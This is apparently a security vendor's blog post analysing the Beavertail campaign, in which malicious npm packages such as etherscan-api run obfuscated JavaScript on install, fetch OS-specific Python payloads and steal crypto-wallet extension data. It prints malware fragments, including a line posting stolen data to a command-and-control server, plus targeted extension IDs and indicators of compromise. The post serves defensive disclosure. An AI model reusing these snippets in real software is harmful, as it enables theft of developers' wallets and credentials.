Tracking Beavertail APT threats in the npm ecosystem

Tracking the movement of known APT groups and malware families Beavertail into the npm ecosystem.

Engineering

June 12, 2024

ProductivityGuideSuccessEfficiency

listen.dev research team has recently discovered a concerning APT campaign where attackers deployed malicious npm packages with highly obfuscated payloads across various CI/CD environments. These attackers exploited the widespread use of open-source libraries, knowing that once injected into a pipeline, these libraries could bypass traditional security defenses. This discovery highlights the increasing risk to development environments and the urgent need for stronger security measures within the software supply chain. Lets dig deeper..

Initial Discovery and Attack Vectors

The Beavertail attack was first identified through the publication of suspicious npm packages:

  • etherscan-api (version 1.3.1)

  • eslint-module-conf (version 2.7.5)

  • eslint-scope-util (version 7.2.3)

All three packages were published by a user named "richard_dev" within a span of 4 days, mimicking legitimate, popular packages to avoid suspicion.

Attack Chain Analysis

The diagram provided shows a multi-stage attack chain, starting from the installation of the compromised npm package and leading to cross-platform persistence and data exfiltration. Let’s break down the critical points in the attack flow:

  1. Initial Infection Vector:

    • When the etherscan-api npm package is installed, the malicious code embedded within it is executed.

    • The first step is the deployment of obfuscated JavaScript, which executes without triggering immediate alerts, as seen in the code snippet:

const _0x25bb31 = function () {let _0x5389c9 = true;
return function (_0x3f0328, _0x145e0a) {
const _0x5c31e1 = _0x5389c9 ? function () {
if (_0x145e0a) {
const _0x4ecdfd = _0x145e0a.apply(_0x3f0328, arguments);
_0x145e0a = null;
return _0x4ecdfd;
}
} : function () {};
_0x5389c9 = false;
return _0x5c31e1;
};
}();

This obfuscated logic hinders reverse engineering and detection by static code analysis tools.

  1. Cross-Platform Attack Execution:

  • The malicious code performs checks to determine the target operating system (Windows, macOS, Linux).

  • Different payloads are delivered based on the OS. For instance, on Windows, the malware checks for the presence of a local Python interpreter and uses it to execute the payload.

if ('w' == _0x5ddb59[0]) {if (_0x16fcc2.existsSync(_0x539184 + "\\.pyp\\python.exe")) {
(() => {
const _0x1afaee = _0x539184 + "/.npl";
const _0x41e3a8 = "\"" + _0x539184 + "\\.pyp\\python.exe\" \"" + _0x1afaee + "\"";
// Execute Windows-specific payload
})();
}
} else {
// Code for Linux/macOS
}

  1. Persistence Mechanism

  • The persistence mechanism relies on a setInterval function that repeatedly executes the payload at 30-second intervals.

let _0x169ac3 = setInterval(() => {
if ((_0x37c2cb += 1) < 5) {
_0x398711();
} else {
clearInterval(_0x169ac3);
}
}, 30000);

This allows the malware to maintain control over the infected machine without constantly triggering alarms, as it reduces its activity after a set number of attempts.

  1. Data Exfiltration:

  • The malware actively targets browser extensions, especially cryptocurrency wallets like MetaMask and MyEtherWallet. It extracts sensitive data from the target browser extensions, uploading it to a Command-and-Control (C2) server at http://95.164.17.24:1224/uploads.

const _0x4b9a51 = {
url: "http://95.164.17.24:1224/uploads",
formData: _0x5123da
};
_0xe36215.post(_0x4b9a51, (_0xbd2573, _0x52290f, _0x3f9f49) => {});

The malicious npm package used in this attack is called etherscan-api, uploaded by the developer account richard_dev. This package, posing as a legitimate utility, is at the heart of the supply chain compromise. Below is a visual reference of the etherscan-api npm package, showing its recent publication on npm:

  1. Extensions Targeted:

  • MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn)

  • MyEtherWallet (ibnejdfjmmkpcnlpebklmnkoeoihofec)

  • Brave, Opera, and Firefox browser data are also targeted for exfiltration.

Behavioral Analysis using listen.dev

Using a detailed network activity review conducted via the listen.dev tool, the following connections were observed:

  • Multiple TCP connections to registry.npmjs.org (likely used for additional payload delivery or version checks).

  • Outbound traffic to objects.githubusercontent.com, indicating a possible use of GitHub to host secondary payloads or updates.

  • TCP connections to GitHub via port 443, further suggesting payload hosting or C2 communication.

    The following filesystem and process activity was also observed:

    • Unauthorized access to /etc/ssl/openssl.cnf

    • Access attempts to browser directories for Chrome, Brave, Opera, and Firefox

    • Suspicious node processes: node /home/runner/work/.../node_modules/.bin/prebuild-install -r napi

Chronological Attack Flow:

Based on the findings, the key stages in the attack flow are as follows:

  1. Malicious npm Package Installation: The user installs the impacted packages from npm–likely through dependency confusion

  2. Obfuscated Code Execution: The installed package deploys obfuscated code, evading traditional static analysis.

  3. Platform Identification: The script detects the target platform (Windows/Linux/macOS).

  4. Payload Delivery:

    • On Windows, a .zip file is downloaded, extracted, and executed via Python.

    • On Linux/macOS, the malware downloads a Python script from the C2 server.

  5. Data Exfiltration: The malware targets browser extensions, primarily cryptocurrency wallets, and sends the data to its C2 server.

  6. Persistence: The setInterval loop ensures continuous execution of the malware.

Indicators of Compromise (IoCs)

  • C2 Server IP: 95.164.17.24

  • C2 Server Port: 1224

  • Files Created:

    • Windows: %USERPROFILE%.pyp\python.exe

    • Linux/macOS: ~/.npl

Stay in the loop

Join our newsletter for updates, research and latest trends in supply chain security.